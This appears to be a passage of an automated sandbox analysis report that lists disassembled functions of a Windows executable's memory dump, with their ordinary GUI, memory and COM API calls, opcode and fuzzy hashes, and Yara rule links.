Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00467CF6

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: d4d004faad0d630aeba2ca4f82056add15f0629c4d82f6b4c9c902c3b36f2cff
Instruction ID: 84cb7d45f9d8793474644a93194044f32f7eba6a2b7a870eb07e14d75927cafd
Opcode Fuzzy Hash: d4d004faad0d630aeba2ca4f82056add15f0629c4d82f6b4c9c902c3b36f2cff
Instruction Fuzzy Hash: F2B19071A0421A9FDB10DF94C484BBEB7B4FF08329F24446AE500E7391E7799D45CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00402B72, Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 0043C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C569
LoadImageW.USER32 ref: 0043C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C5C0
DestroyIcon.USER32(00000000), ref: 0043C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C5EC
DestroyIcon.USER32(?), ref: 0043C5FB

Part of subcall function 0048A71E: DeleteObject.GDI32(00000000), ref: 0048A757

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 61ada204b0baa075d0d90a1bef732fe5bc3f929f5ee94e243fbc7940e1d17bda
Instruction ID: ec079f4291a2db88e8ca5db72d3a048905e4d4933e17b5c0ba9f28e8cd77e0c5
Opcode Fuzzy Hash: 61ada204b0baa075d0d90a1bef732fe5bc3f929f5ee94e243fbc7940e1d17bda
Instruction Fuzzy Hash: 90515C74600205AFDB24DF25CD89FAA37B5EB58710F10452EF902A72D0DBB8ED91DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00479E38, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00479E90
NULL Pointer assignment, xrefs: 00479EB9, 0047A1DD

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 31e2c12c271a36dd915c6d3dc0dfc9dbb9e6e7f409bcd64ed9da06d0fd1946b5
Instruction ID: d1c791fb0e6f22c0c68d958e545617c08fe4ee677592400c8048375e82c93b3c
Opcode Fuzzy Hash: 31e2c12c271a36dd915c6d3dc0dfc9dbb9e6e7f409bcd64ed9da06d0fd1946b5
Instruction Fuzzy Hash: E1C1A071A0020A9FDF10CF68C884BEEB7B5FB88314F54846AE909EB381E7789D55CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00463226, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 004632C5

Strings

warning, xrefs: 004632AE
question, xrefs: 0046327E
info, xrefs: 00463266
blank, xrefs: 00463247
stop, xrefs: 00463296

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 77fe609f7d7df2f5dc9ffe3ad1bea5ae7a1829eac4f59a579a3ff1f305724edc
Instruction ID: bd39f8208ce013f69ee2957a59db9678c91d00ade58264490e67fb22ecbd3877
Opcode Fuzzy Hash: 77fe609f7d7df2f5dc9ffe3ad1bea5ae7a1829eac4f59a579a3ff1f305724edc
Instruction Fuzzy Hash: F41138313083967AA7015E55EC62DABB3ACDF19766F2000ABF40056281F67D5B1106BF

Uniqueness

Uniqueness Score: -1.00%

Function 0048D74C, Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

GetSystemMetrics.USER32 ref: 0048D78A
GetSystemMetrics.USER32 ref: 0048D7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048DA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048DA24
ShowWindow.USER32(00000003,00000000), ref: 0048DA43
InvalidateRect.USER32(?,00000000,00000001), ref: 0048DA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 0048DA8B

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: f70638cb6bdb2bd2f28f86c149af183c7a65bc4c621125ccc619a6dbdc1ddf3f
Instruction ID: eb940e76658434b7ad8eeabe1703afeb33935e81992f953b53c46158808d9c3e
Opcode Fuzzy Hash: f70638cb6bdb2bd2f28f86c149af183c7a65bc4c621125ccc619a6dbdc1ddf3f
Instruction Fuzzy Hash: C9B19B71901215EBDF18EF68C9857BE7BB1FF48700F18847AEC48AB295D738A950CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00402A5B, Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C417,00000004,00000000,00000000,00000000), ref: 00402ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C417,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C417,00000004,00000000,00000000,00000000), ref: 0043C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C417,00000004,00000000,00000000,00000000), ref: 0043C4D6

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 5d7a265bfa4b2b0f4e892985f1cda791045749e89afcf4abe5dc01cf4c95db47
Instruction ID: 8b6c8ed304f0763f3ef54d0254f4868818f2511668e6adff05f7a0ccbdd179e1
Opcode Fuzzy Hash: 5d7a265bfa4b2b0f4e892985f1cda791045749e89afcf4abe5dc01cf4c95db47
Instruction Fuzzy Hash: 7E41DC307046809ADB754B288EDC67B7B91AB95314F14883FE046B66E0CABDA846DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00401424, Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09c15824ac63a65c0734988e0de1478892bca8845b386477e243a1c01ae4827c
Instruction ID: 504086b8ac0d12f7a80c9a28070c24604f60f8592932f63d6c8978218f7d0df9
Opcode Fuzzy Hash: 09c15824ac63a65c0734988e0de1478892bca8845b386477e243a1c01ae4827c
Instruction Fuzzy Hash: CF718170900109EFCB04DF94CC84EBFBB74FF85314F10816AF915AA2A1C738AA11CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0048B60B, Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00C29938), ref: 0048B6A5
IsWindowEnabled.USER32(00C29938), ref: 0048B6B1
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0048B795
SendMessageW.USER32(00C29938,000000B0,?,?), ref: 0048B7CC
IsDlgButtonChecked.USER32(?,?), ref: 0048B809
GetWindowLongW.USER32(00C29938,000000EC), ref: 0048B82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B843

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: ff14fa38de5f0b27e4dc6a9d98642c1f41753b175040c623b2d1a44597c1e3a2
Instruction ID: a7d0881697c90ebb8ac62a69b5506f8dd5c31139f9226510073890e22dad6404
Opcode Fuzzy Hash: ff14fa38de5f0b27e4dc6a9d98642c1f41753b175040c623b2d1a44597c1e3a2
Instruction Fuzzy Hash: 3A719034600304AFDB20AF64C894FAE7BB9FF49300F15486EE945A7361D739A841DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401DB3, Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00401DDC
GetWindowRect.USER32(?,?), ref: 00401E1D
ScreenToClient.USER32(?,?), ref: 00401E45
GetClientRect.USER32(?,?), ref: 00401F74
GetWindowRect.USER32(?,?), ref: 00401F8D

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: d137a9c50dddbd1c864f695680de21518bce5053a59fcecd0cad3697e154db73
Instruction ID: ed51bef88b18f13e8c67287d0da0124a028b815528b7051244985eeafb7c58ca
Opcode Fuzzy Hash: d137a9c50dddbd1c864f695680de21518bce5053a59fcecd0cad3697e154db73
Instruction Fuzzy Hash: 6BB14E7990024ADBDF10CFA8C5807EEB7B1FF08310F14952AED59AB361DB34A951CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0046675A, Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004668AD
_memmove.LIBCMT ref: 004667E8

Part of subcall function 00409997: __itow.LIBCMT ref: 004099C2
Part of subcall function 00409997: __swprintf.LIBCMT ref: 00409A0C

Part of subcall function 00420FF6: _malloc.LIBCMT ref: 0042100E

_memmove.LIBCMT ref: 0046685B
_memmove.LIBCMT ref: 00466942
_memmove.LIBCMT ref: 0046695B
_memmove.LIBCMT ref: 00466977

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$__itow__swprintf_malloc
String ID:
API String ID: 83262069-0
Opcode ID: cf16c8a2b6a9d16e6537bc8ae527a6d5f10807ce405b390681a78f43c738a211
Instruction ID: 6f91ede795408b0bfae053ebd451bddb5c2729c6fb0f0f0f08a4ed72ad27e223
Opcode Fuzzy Hash: cf16c8a2b6a9d16e6537bc8ae527a6d5f10807ce405b390681a78f43c738a211
Instruction Fuzzy Hash: C9619F7060025A9BDF11EF66C881EFE37A4AF0430CF45452EF8556B2D2EB38AD05CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004626F9, Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462792
IsMenu.USER32 ref: 004627B2
CreatePopupMenu.USER32 ref: 004627E6
GetMenuItemCount.USER32(000000FF), ref: 00462844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462875

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
Instruction ID: ae907cd3f2aa1f5fb6f168798142b7ed047680f4cd9d897be70698fd7a4ddbb7
Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
Instruction Fuzzy Hash: FD51B270A00705FFDF14DF68CE88AAEBBF4AF44314F10462EE4119B291E7B88904CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00401765, Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0040179A
GetWindowRect.USER32(?,?), ref: 004017FE
ScreenToClient.USER32(?,?), ref: 0040181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0040182C
EndPaint.USER32(?,?), ref: 00401876

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: f83e22be4ec08e4416acf2e7a9eb32b17cef3cd4e201653c29a1d580359e6f65
Instruction ID: f496b0d24a919446a821901bb08c967343d20a2d6e91284dadc4af8012d8984c
Opcode Fuzzy Hash: f83e22be4ec08e4416acf2e7a9eb32b17cef3cd4e201653c29a1d580359e6f65
Instruction Fuzzy Hash: F8418C71100200AFD710EF25C884FAA7BE8EB49724F044A3EFA94962F1C7359946DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0048B958, Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(004C67B0,00000000,00C29938,?,?,004C67B0,?,0048B862,?,?), ref: 0048B9CC
EnableWindow.USER32(?,00000000), ref: 0048B9F0
ShowWindow.USER32(004C67B0,00000000,00C29938,?,?,004C67B0,?,0048B862,?,?), ref: 0048BA50
ShowWindow.USER32(?,00000004,?,0048B862,?,?), ref: 0048BA62
EnableWindow.USER32(?,00000001), ref: 0048BA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048BAA9

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
Instruction ID: 4bbfffa5aca34bc284a6f875752b5b7a56a0dd7a11c68d007de5de2d50af2dcc
Opcode Fuzzy Hash: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
Instruction Fuzzy Hash: 6E416470600241EFDB25DF14C489B9A7BE0FF05314F1846BAEE589F3A2C735A84ADB95

Uniqueness

Uniqueness Score: -1.00%

Function 0048C19A, Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 004012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
Part of subcall function 004012F3: SelectObject.GDI32(?,00000000), ref: 0040135C
Part of subcall function 004012F3: BeginPath.GDI32(?), ref: 00401373
Part of subcall function 004012F3: SelectObject.GDI32(?,00000000), ref: 0040139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0048C1C4
LineTo.GDI32(00000000,00000003,?), ref: 0048C1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0048C1E6
LineTo.GDI32(00000000,00000000,?), ref: 0048C1F6
EndPath.GDI32(00000000), ref: 0048C206
StrokePath.GDI32(00000000), ref: 0048C216

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: bc183b863d25148f1850e921a38b1f50aaa057c6c296e3ddc5a0a673332eb76c
Instruction ID: ccdd2b6199ca87c5987ba8fb438783b6dd83c6b3b3853e6015e3ed05b8f1b088
Opcode Fuzzy Hash: bc183b863d25148f1850e921a38b1f50aaa057c6c296e3ddc5a0a673332eb76c
Instruction Fuzzy Hash: FD111B7640010CBFDF11AF90DC88EAE7FADEB08354F048476BE185A1A1D7719D59DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004674D2, Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 004674E5
EnterCriticalSection.KERNEL32(?,?,00411044,?,?), ref: 004674F6
TerminateThread.KERNEL32(00000000,000001F6,?,00411044,?,?), ref: 00467503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00411044,?,?), ref: 00467510

Part of subcall function 00466ED7: CloseHandle.KERNEL32(00000000,?,0046751D,?,00411044,?,?), ref: 00466EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00467523
LeaveCriticalSection.KERNEL32(?,?,00411044,?,?), ref: 0046752A

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
Instruction ID: 9734b5ccd6540a82fb48e8287cb809d44fcf662c2da7f217d7ce71899fdcd72b
Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
Instruction Fuzzy Hash: 9EF0823A140A12EBDB111B64FC8C9EF773AFF45312B5009BAF203914B0EB7A5815CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00462C42, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00462CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00462D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C6890,00000000), ref: 00462D5A

Strings

0, xrefs: 00462CA4

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
Instruction ID: 0ba1456fd131f45ac79e83895ae1ccd7d82afcfcc3e6ebc7136bcd4d9a7bd99d
Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
Instruction Fuzzy Hash: F8419130204702AFD720DF25C944B5BB7E4AF85324F14462EF96597291E7B8E904CBAB

Uniqueness

Uniqueness Score: -1.00%

Function 004012F3, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
SelectObject.GDI32(?,00000000), ref: 0040135C
BeginPath.GDI32(?), ref: 00401373
SelectObject.GDI32(?,00000000), ref: 0040139C

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: d4d4c8074a2dddb84468a25ad0c171745cbd4a4b28271cbc8231a5ff8f861484
Instruction ID: 01809ca1199762821c7ccc43aba1927c018ed3358b57c1522327ad2857708082
Opcode Fuzzy Hash: d4d4c8074a2dddb84468a25ad0c171745cbd4a4b28271cbc8231a5ff8f861484
Instruction Fuzzy Hash: 9B213070801304EFEB11AF65DC04B6A7BB8FB00321F55863BF810A62F0D7799995DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00435332, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0043533E

Part of subcall function 0042594C: __FF_MSGBANNER.LIBCMT ref: 00425963
Part of subcall function 0042594C: __NMSG_WRITE.LIBCMT ref: 0042596A
Part of subcall function 0042594C: RtlAllocateHeap.NTDLL(00C10000,00000000,00000001,00000000,?,?,?,00421013,?), ref: 0042598F

_free.LIBCMT ref: 00435351

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: ab35778a9cc97f6e0a94f0b3f5ee58bea3ade87e3782345d4463fa0fc8671856
Instruction ID: ca36ded951c5b74dcd14922bdbfcb28a3672708b69dba933c6c60362b96cb12c
Opcode Fuzzy Hash: ab35778a9cc97f6e0a94f0b3f5ee58bea3ade87e3782345d4463fa0fc8671856
Instruction Fuzzy Hash: 7211C132605A25AECB212F71B84565E37A89F183B4F60182FFD049A290DABD8941879D

Uniqueness

Uniqueness Score: -1.00%

Function 00457631, Relevance: 7.6, APIs: 5, Instructions: 60stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0045810E: RaiseException.KERNEL32(8007000E,?,00000000,00000000,?,00457651,-C0000018,00000001,?,0045758C,80070057,?,?,?,0045799D), ref: 0045811B

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?,?,0045799D), ref: 0045766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?), ref: 0045768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?), ref: 00457698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?), ref: 004576A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0045758C,80070057,?,?), ref: 004576B4

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

